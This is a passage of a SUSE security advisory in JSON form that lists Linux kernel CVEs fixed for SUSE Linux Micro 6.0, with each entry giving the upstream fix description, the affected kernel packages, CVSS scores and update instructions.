"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68783"
},
{
"cve": "CVE-2025-68788",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68788"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfsnotify: do not generate ACCESS/MODIFY events on child for special files\n\ninotify/fanotify do not allow users with no read access to a file to\nsubscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the\nsame user to subscribe for watching events on children when the user\nhas access to the parent directory (e.g. /dev).\n\nUsers with no read access to a file but with read access to its parent\ndirectory can still stat the file and see if it was accessed/modified\nvia atime/mtime change.\n\nThe same is not true for special files (e.g. /dev/null). Users will not\ngenerally observe atime/mtime changes when other users read/write to\nspecial files, only when someone sets atime/mtime via utimensat().\n\nAlign fsnotify events with this stat behavior and do not generate\nACCESS/MODIFY events to parent watchers on read/write of special files.\nThe events are still generated to parent watchers on utimensat(). This\ncloses some side-channels that could be possibly used for information\nexfiltration [1].\n\n[1] https://snee.la/pdf/pubs/file-notification-attacks.pdf",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68788",
"url": "https://www.suse.com/security/cve/CVE-2025-68788"
},
{
"category": "external",
"summary": "SUSE Bug 1256638 for CVE-2025-68788",
"url": "https://bugzilla.suse.com/1256638"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68788"
},
{
"cve": "CVE-2025-68789",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68789"
}
],
"notes": [
{
"category": "general",
"text": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68789",
"url": "https://www.suse.com/security/cve/CVE-2025-68789"
},
{
"category": "external",
"summary": "SUSE Bug 1256781 for CVE-2025-68789",
"url": "https://bugzilla.suse.com/1256781"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68789"
},
{
"cve": "CVE-2025-68795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nethtool: Avoid overflowing userspace buffer on stats query\n\nThe ethtool -S command operates across three ioctl calls:\nETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and\nETHTOOL_GSTATS for the values.\n\nIf the number of stats changes between these calls (e.g., due to device\nreconfiguration), userspace\u0027s buffer allocation will be incorrect,\npotentially leading to buffer overflow.\n\nDrivers are generally expected to maintain stable stat counts, but some\ndrivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making\nthis scenario possible.\n\nSome drivers try to handle this internally:\n- bnad_get_ethtool_stats() returns early in case stats.n_stats is not\n equal to the driver\u0027s stats count.\n- micrel/ksz884x also makes sure not to write anything beyond\n stats.n_stats and overflow the buffer.\n\nHowever, both use stats.n_stats which is already assigned with the value\nreturned from get_sset_count(), hence won\u0027t solve the issue described\nhere.\n\nChange ethtool_get_strings(), ethtool_get_stats(),\nethtool_get_phy_stats() to not return anything in case of a mismatch\nbetween userspace\u0027s size and get_sset_size(), to prevent buffer\noverflow.\nThe returned n_stats value will be equal to zero, to reflect that\nnothing has been returned.\n\nThis could result in one of two cases when using upstream ethtool,\ndepending on when the size change is detected:\n1. When detected in ethtool_get_strings():\n # ethtool -S eth2\n no stats available\n\n2. When detected in get stats, all stats will be reported as zero.\n\nBoth cases are presumably transient, and a subsequent ethtool call\nshould succeed.\n\nOther than the overflow avoidance, these two cases are very evident (no\noutput/cleared stats), which is arguably better than presenting\nincorrect/shifted stats.\nI also considered returning an error instead of a \"silent\" response, but\nthat seems more destructive towards userspace apps.\n\nNotes:\n- This patch does not claim to fix the inherent race, it only makes sure\n that we do not overflow the userspace buffer, and makes for a more\n predictable behavior.\n\n- RTNL lock is held during each ioctl, the race window exists between\n the separate ioctl calls when the lock is released.\n\n- Userspace ethtool always fills stats.n_stats, but it is likely that\n these stats ioctls are implemented in other userspace applications\n which might not fill it. The added code checks that it\u0027s not zero,\n to prevent any regressions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68795",
"url": "https://www.suse.com/security/cve/CVE-2025-68795"
},
{
"category": "external",
"summary": "SUSE Bug 1256688 for CVE-2025-68795",
"url": "https://bugzilla.suse.com/1256688"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68795"
},
{
"cve": "CVE-2025-68797",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68797"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nchar: applicom: fix NULL pointer dereference in ac_ioctl\n\nDiscovered by Atuin - Automated Vulnerability Discovery Engine.\n\nIn ac_ioctl, the validation of IndexCard and the check for a valid\nRamIO pointer are skipped when cmd is 6. However, the function\nunconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the\nend.\n\nIf cmd is 6, IndexCard may reference a board that does not exist\n(where RamIO is NULL), leading to a NULL pointer dereference.\n\nFix this by skipping the readb access when cmd is 6, as this\ncommand is a global information query and does not target a specific\nboard context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68797",
"url": "https://www.suse.com/security/cve/CVE-2025-68797"
},
{
"category": "external",
"summary": "SUSE Bug 1256660 for CVE-2025-68797",
"url": "https://bugzilla.suse.com/1256660"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68797"
},
{
"cve": "CVE-2025-68798",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68798"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/amd: Check event before enable to avoid GPF\n\nOn AMD machines cpuc-\u003eevents[idx] can become NULL in a subtle race\ncondition with NMI-\u003ethrottle-\u003ex86_pmu_stop().\n\nCheck event for NULL in amd_pmu_enable_all() before enable to avoid a GPF.\nThis appears to be an AMD only issue.\n\nSyzkaller reported a GPF in amd_pmu_enable_all.\n\nINFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143\n msecs\nOops: general protection fault, probably for non-canonical address\n 0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7]\nCPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk\nRIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195\n arch/x86/events/core.c:1430)\nRSP: 0018:ffff888118009d60 EFLAGS: 00010012\nRAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\nRDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0\nRBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002\nR13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601\nFS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0\nCall Trace:\n \u003cIRQ\u003e\namd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2))\nx86_pmu_enable (arch/x86/events/core.c:1360)\nevent_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186\n kernel/events/core.c:2346)\n__perf_remove_from_context (kernel/events/core.c:2435)\nevent_function (kernel/events/core.c:259)\nremote_function (kernel/events/core.c:92 (discriminator 1)\n kernel/events/core.c:72 (discriminator 1))\n__flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64\n kernel/smp.c:135 kernel/smp.c:540)\n__sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207\n ./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272)\nsysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47)\n arch/x86/kernel/smp.c:266 (discriminator 47))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68798",
"url": "https://www.suse.com/security/cve/CVE-2025-68798"
},
{
"category": "external",
"summary": "SUSE Bug 1256689 for CVE-2025-68798",
"url": "https://bugzilla.suse.com/1256689"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68798"
},
{
"cve": "CVE-2025-68800",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68800"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats\n\nCited commit added a dedicated mutex (instead of RTNL) to protect the\nmulticast route list, so that it will not change while the driver\nperiodically traverses it in order to update the kernel about multicast\nroute stats that were queried from the device.\n\nOne instance of list entry deletion (during route replace) was missed\nand it can result in a use-after-free [1].\n\nFix by acquiring the mutex before deleting the entry from the list and\nreleasing it afterwards.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\nRead of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043\n\nCPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full)\nHardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017\nWorkqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xba/0x110\n print_report+0x174/0x4f5\n kasan_report+0xdf/0x110\n mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x70\n __kasan_slab_free+0x43/0x70\n kfree+0x14e/0x700\n mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68800",
"url": "https://www.suse.com/security/cve/CVE-2025-68800"
},
{
"category": "external",
"summary": "SUSE Bug 1256646 for CVE-2025-68800",
"url": "https://bugzilla.suse.com/1256646"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
